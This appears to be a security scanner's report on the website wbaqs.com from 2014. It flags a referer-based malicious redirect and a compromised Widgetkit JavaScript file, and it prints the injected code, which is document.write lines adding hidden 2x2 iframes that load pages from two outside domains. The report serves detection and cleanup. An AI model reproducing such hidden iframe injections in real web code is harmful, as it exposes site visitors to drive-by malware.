Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://wbaqs.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: wbaqs.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 01:52:26 GMT Location: http://habboigratis.altervista.org/ohmf.html?h=965857 Server: Apache Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://wbaqs.com/ | 200 OK Content-Length: 55302 Content-Type: text/html | clean |
http://wbaqs.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://wbaqs.com/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://wbaqs.com/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://wbaqs.com/media/widgetkit/js/jquery.js | 200 OK Content-Length: 94490 Content-Type: application/javascript | clean |
http://wbaqs.com/cache/widgetkit/widgetkit-9ee3055b.js | 200 OK Content-Length: 10258 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://23bacio.com/ehzd.html?j=965857></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=965857></iframe>');
window["WIDGETKIT_URL"]="/media/widgetkit";
function wk_ajax_render_url(widgetid){return"/index.php/component/widgetkit/?tmpl=raw&
$widgetkit.trans.addDic({"LESS_THAN_A_MINUTE_AGO":"less than a minute ago","ABOUT_A_MINUTE_AGO":"about a minute ago","X_MINUTES_AGO":"%s minutes ago","ABOUT_AN_HOUR_AGO":"about an hour ago","X_HOURS_AGO":"about %s hours ago","ONE_DAY_AGO":"1 day ago","X_DAYS_AGO":"%s days ago"});
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://23bacio.com/ehzd.html?j=965857
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://23bacio.com/ehzd.html?j=965857>
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=965857
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=965857>
http://wbaqs.com/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163628 Content-Type: application/x-javascript | clean |
http://wbaqs.com/templates/j51_oxygen/js/dropdown.js | 200 OK Content-Length: 51309 Content-Type: application/javascript | clean |
http://wbaqs.com/templates/j51_oxygen/js/equalizer.js | 200 OK Content-Length: 787 Content-Type: application/javascript | clean |
http://wbaqs.com/modules/mod_AutsonSlideShow/js/jquery-1.5.2.min.js | 200 OK Content-Length: 85925 Content-Type: application/javascript | clean |
http://wbaqs.com/modules/mod_AutsonSlideShow/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://wbaqs.com/modules/mod_AutsonSlideShow/js/jquery.animate-colors-min.js | 200 OK Content-Length: 1736 Content-Type: application/javascript | clean |
http://wbaqs.com/modules/mod_AutsonSlideShow/js/jquery.skitter.min.js | 200 OK Content-Length: 50242 Content-Type: application/javascript | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wbaqs.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wbaqs.com/
Result: wbaqs.com is not infected or malware details are not published yet.